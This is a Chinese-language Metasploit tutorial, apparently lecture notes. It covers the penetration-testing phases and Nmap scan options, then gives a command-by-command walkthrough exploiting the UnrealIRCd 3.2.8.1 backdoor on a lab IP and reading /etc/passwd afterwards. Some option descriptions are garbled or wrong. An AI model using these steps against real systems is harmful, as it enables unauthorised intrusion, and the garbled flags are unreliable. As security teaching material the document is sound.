Metasploit 进阶第一讲    攻击流程及命令介绍

01.渗透测试过程环节（PTES）

1.前期交互阶段：与客户组织进行交互讨论，确定范围，目标等

2.情报搜集阶段：获取更多目标组织信息，Nmap、Nessus等

3.威胁建模阶段：理清头绪，确定出最可行的攻击通道

4.漏洞分析阶段：搜索可获取的渗透代码资源

5.渗透攻击阶段：找出安全漏洞，入侵系统

6.后渗透攻击阶段：你想干什么，Mctcrprctcr

7.报告阶段：渗透测试报告

02. Metasploit漏洞利用环节

情报搜集阶段

外围信息搜索   -    Google Hacking等

主机探测与端口扫描          -Nmap等

服务扫描       -auxiliary/scanner/tclnet/…等（见目录）

网络漏洞扫描   -OpenVAS、Nessus等

情报搜集阶段—Nmap

格式：nmap<扫描选项，<扫描目标>

·扫描选项：指定扫描方式      ·扫描目标：

-sn         -探测存活主机，不扫描端口                         单个p地址

-o                  -目标操作系统识别                                          多个p地址，用逗号分割（，）

-sV         -详细服务版本信息                                         连续ip地址，用连字符号（-）

-f                   -快速扫描                                                    CIDR表示，192.168.22.0/24

-sT/-sS/-sA                 -全连接/syn扫描/ack扫描，

同auxiliary/scanner/portscan/..模块

-sU                              -udp端口扫描了

-p<端口范围>           指定扫描端口

…

Nmap  –sV  -o  192.168.24.139

状态：

open 应用程序正在此端口监听

closed 主机响应，无应用程序监听

filtered 不确定是否开放

unfiltered 无法确定端口是否开放（仅出现在ack扫描时）

nmap  -A  -p  6667   192.168.24.139

情报搜集阶段--其他姿势

漏洞分析阶段

IRC:“Internet Rely Chat”的缩写，网络中继聊天，通过网络的即时交流工具。

IRC运作方式：是一种分布式的客户端/服务器的结构，一个IRC服务器内部包含多个IRC频道，这些频道和qq群类似。若频道不是保留频道且频道中无人，该频道就会消失，而想加入某个频道，若频道名不存在，则会创建这个频道，创建者为管理员，频道内部可私聊。

IRC端口：服务器端口：6667，客户端端口：6697，连接使用的是SSL。

1.msfconsole             -启动metasploit框架

2.search unreal ircd3.2.8.1     -在metasploit框架中查询相关模块

3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor  -查看模块信息，命名规则：模块类型/目标平台/目标服务/模块名称

4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb         -查看源代码（也可在目录中查看）

渗透攻击阶段

1.use exploit/unix/irc/unreal_ircd_3281_backdoor             -使用该模块

2.show  options    -查看需配置的参数（Required为yes的选项必须配置）

3.set  rhosts  192.168.24.139     -配置目标ip地址

4.run/exploit   -运行该模块

5.whoami；cat/etc/passwd      -成功后查看目标主机信息

Metasploit漏洞利用流程总结

Metasploit命令：

1.     msfconsole

2.     search相关模块

3.     use模块路径

4.     show  options

5.set <参数名称> <参数信息

6.run/exploit

7..